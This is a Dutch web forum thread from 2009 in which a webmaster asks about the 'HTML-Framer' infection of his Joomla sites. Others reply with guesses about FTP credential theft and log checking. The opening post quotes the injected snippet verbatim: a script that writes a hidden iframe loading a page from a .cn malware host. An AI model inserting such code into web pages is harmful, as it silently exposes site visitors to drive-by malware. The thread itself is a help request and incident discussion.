Toon posts:

HTML-Framer: virus of exploit?

Pagina: 1
Acties:

dinsdag 23 juni 2009 12:14

Acties:
  • 0 Henk 'm!
  • Pietert
  • Registratie: Januari 2001
  • Niet online

Pietert

There is no spoon

Topicstarter
Heb bij wat websites opeens malicious code in de index.html en index.php bestanden staan, AVG geeft het de naam HTML-Framer.

In de site zelf is een frame geimplementeerd naar een bedenkeennaam.cn:8080 website die momenteel nog niet actief is. Als die echt geladen wordt weet ik niet wat er zal gebeuren.

Dat het geen exploit lijkt te zijn komt omdat er weinig bekend over is als je het internet afzoekt en het op 3 verschillende CMS systemen voorkomt. Je zou dan toch een hoop meer informatie en verspreiding verwachten.

Geinfecteerde bestanden webserver A:
/htdocs/administrator/components/com_comprofiler/ue_config.php
/htdocs/administrator/components/com_ja_submit/settings.php
/htdocs/administrator/components/com_xevgfx/config.xevgfx.php
/htdocs/administrator/components/com_seyret/seyret_config.php
/htdocs/administrator/components/com_fireboard/fireboard_config.php
/htdocs/administrator/components/com_comprofiler_old/ue_config.php

Code die er in geplaatst is:
code:
1

?><!-- counter --><script language=javascript>status=location;document.write('<iframe src="http://beachhouse.cn/in.cgi?tycoon4" width=0 height=0 frameborder=0 style="display:none" onLoad="status=defaultStatus;"></iframe>');</script><!-- counter -->


Het lijkt middels FTP binnen te komen, kan dus een virus/script zijn dat FTP wachtwoorden heeft gestolen en ze vervolgens automatisch infecteert met iframes?

Heeft iemand van HTML-Framer gehoord en meer informatie voor me?

#huiskamer | Amsterdammert | Some days you're the pigeon, some days you're the statue | Zenbook S13 UM5302TA-LV067W | LG 40WP95CP-W | HP USB-C dock G5

dinsdag 23 juni 2009 12:22

Acties:
  • 0 Henk 'm!
  • CH4OS
  • Registratie: April 2002
  • Niet online

CH4OS

It's a kind of magic

Ik weet wel dat er van Community Builder / Joomlapolis een mailtje de deur uit is geweest, waarin een lek werd ontdekt in CB. Tevens werd er geadviseerd om Joomla te updaten naar 1.5.1.

Welke versie van Joomla draaid er op webserver A?

dinsdag 23 juni 2009 12:22

Acties:
  • 0 Henk 'm!
  • LuckY
  • Registratie: December 2007
  • Niet online

LuckY

Er zijn momenteel wel meerdere wormen actief die massaal FTP gegevens stelen en in laten loggen om bestanden te infecteren. Echter zijn er zoveel manieren waarop deze bestanden overschreven worden, heb je er geen logs van ?

dinsdag 23 juni 2009 12:24

Acties:
  • 0 Henk 'm!

Anoniem: 165232

Ja: wellicht is dit artikel interessant voor je:

http://www.security.nl/ar...aanval_dendert_voort.html

en dit artikeltje over een css hack: http://www.making-the-web.com/misc/sites-you-visit/nojs/ (Pas hij gaat gelijk je history checken!. Maar wel interessant).

.cn domeinen worden veel door spamboeren gebruikt, check ff je FTP logs, en wellicht je access logs (misschien is het door codeexecution geplaatst). Als je vermoed dat je totaal gehackt bent, neem dan passende maatregelen!

dinsdag 23 juni 2009 12:32

Acties:
  • 0 Henk 'm!
  • Pietert
  • Registratie: Januari 2001
  • Niet online

Pietert

There is no spoon

Topicstarter
Heb geen heel close beheer op de FTPservers dus de vraag naar logs staat momenteel nog uit. De versie die draait (Joomla) is de laatste dus dat zit wel goed. Het geeft me nog een reden om te denken dat het iets heel anders is dat FTP gegevens steelt en zich nu alleen manifesteert als HTML-Framer.

HTML-Framer lijkt dus een gevolg en geen oorzaak.

Mijn technische kennis is trouwens behoorlijk beperkt, waar zou ik in een logbestand naar moeten kijken?

Voorbeeld FTPlog:
code:
1
2
3

Thu Jun 18 08:01:17 2009 0 xx.xx.232.54 10672 /var/www/vhosts/bedrijfsnaam.nl/httpdocs/index_oud.html a _ o r bedrijfsnaam ftp 0 * c 
Thu Jun 18 08:01:27 2009 0 xx.xx.88.124 10800 /var/www/vhosts/bedrijfsnaam.nl/httpdocs/index_oud.html a _ i r bedrijfsnaam ftp 0 * c 
Thu Jun 18 08:01:34 2009 0 xx.xx.117.34 6333 /var/www/vhosts/bedrijfsnaam.nl/httpdocs/_backup_/index.html a _ o r bedrijfsnaam ftp 0 * c


en zo blijft het doorgaan voor alle .html of .php bestanden met index in de naam, in alle folders die aanwezig zijn.

#huiskamer | Amsterdammert | Some days you're the pigeon, some days you're the statue | Zenbook S13 UM5302TA-LV067W | LG 40WP95CP-W | HP USB-C dock G5

dinsdag 23 juni 2009 12:37

Acties:
  • 0 Henk 'm!
  • CH4OS
  • Registratie: April 2002
  • Niet online

CH4OS

It's a kind of magic

Pietert schreef op dinsdag 23 juni 2009 @ 12:32:
Mijn technische kennis is trouwens behoorlijk beperkt, waar zou ik in een logbestand naar moeten kijken?

Voorbeeld FTPlog:
code:
1
2
3

Thu Jun 18 08:01:17 2009 0 xx.xx.232.54 10672 /var/www/vhosts/bedrijfsnaam.nl/httpdocs/index_oud.html a _ o r bedrijfsnaam ftp 0 * c 
Thu Jun 18 08:01:27 2009 0 xx.xx.88.124 10800 /var/www/vhosts/bedrijfsnaam.nl/httpdocs/index_oud.html a _ i r bedrijfsnaam ftp 0 * c 
Thu Jun 18 08:01:34 2009 0 xx.xx.117.34 6333 /var/www/vhosts/bedrijfsnaam.nl/httpdocs/_backup_/index.html a _ o r bedrijfsnaam ftp 0 * c


en zo blijft het doorgaan voor alle .html of .php bestanden met index in de naam, in alle folders die aanwezig zijn.
Je zou een tracert kunnen doen naar de genoemde IP-adressen, wellicht dat je daarmee wat vind of kan achterhalen via CMD:
tracert xx.xx.xx.xx

dinsdag 23 juni 2009 16:00

Acties:
  • 0 Henk 'm!
  • Pietert
  • Registratie: Januari 2001
  • Niet online

Pietert

There is no spoon

Topicstarter
Wordt er niets wijzer van, verwacht daar ook niet een 'dader' aan te treffen eigenlijk...

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

C:\Users\pietert>tracert 24.203.102.86

Traceren van de route naar modemcable086.102-203-24.mc.videotron.ca [24.203.102.
86]
via maximaal 30 hops:

  1     1 ms     1 ms   <1 ms  firewall.xxx.local [192.168.0.1]
  2     2 ms     1 ms     2 ms  static.xxx.net [xx.xx.208.137]
  3     6 ms     4 ms     3 ms  nl-asd-dc2-ias-arg27.kpn.net [62.12.4.64]
  4     7 ms     6 ms     6 ms  nl-asd-dc2-ipc-br01.kpn.net [195.190.227.99]
  5     6 ms     6 ms     6 ms  asd-dc2-ipc-br01.nl.kpn.net [195.190.233.85]
  6     4 ms     4 ms     4 ms  195.190.233.247
  7     7 ms     8 ms     9 ms  obl-rou-1021.NL.eurorings.net [134.222.231.130]

  8    85 ms    84 ms    85 ms  nyk-s1-rou-1021.US.eurorings.net [134.222.231.23
4]
  9    86 ms    85 ms    85 ms  Port-channel100.ar4.NYC1.gblx.net [64.211.1.249]

 10    91 ms    91 ms    91 ms  savvis-1.ar2.DCA3.gblx.net [64.212.107.26]
 11    91 ms    90 ms    90 ms  er2-tengig2-1.virginiaequinix.savvis.net [204.70
.193.102]
 12     *       91 ms    90 ms  cr2-tengig0-7-3-0.washington.savvis.net [204.70.
197.246]
 13     *      101 ms   100 ms  cr2-pos-0-0-0-0.NewYork.savvis.net [204.70.192.2
]
 14   101 ms   101 ms   101 ms  er2-tengig-3-1.NewYork.savvis.net [204.70.198.18
]
 15   117 ms   117 ms   117 ms  216.113.125.45
 16   116 ms   116 ms   116 ms  ia-bebn-bb04-ge14-0-0.vtl.net [216.113.122.97]
 17   116 ms   116 ms   117 ms  ia-bebn-bb04-ge2-0-0-cpe038.vtl.net [216.113.122
.38]
 18   116 ms   116 ms   117 ms  24.200.225.134
 19     *        *        *     Time-out bij opdracht.
 20     *        *        *     Time-out bij opdracht.
 21     *        *        *     Time-out bij opdracht.
 22     *        *        *     Time-out bij opdracht.
 23     *        *        *     Time-out bij opdracht.
 24     *        *

[ Voor 3% gewijzigd door Pietert op 23-06-2009 16:01 ]

#huiskamer | Amsterdammert | Some days you're the pigeon, some days you're the statue | Zenbook S13 UM5302TA-LV067W | LG 40WP95CP-W | HP USB-C dock G5

woensdag 15 juli 2009 12:24

Acties:
  • 0 Henk 'm!
  • B4tman_DH
  • Registratie: Oktober 1999
  • Laatst online: 21:38

B4tman_DH

To the Bat.....

Is er inmiddels een removal tool beschikbaar?

Als ik zo op internet zoek heeft een groot deel v/d webmasters er last van (waaronder ik zelf)
Pagina: 1
Reageer

Apple iPhone 16e LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq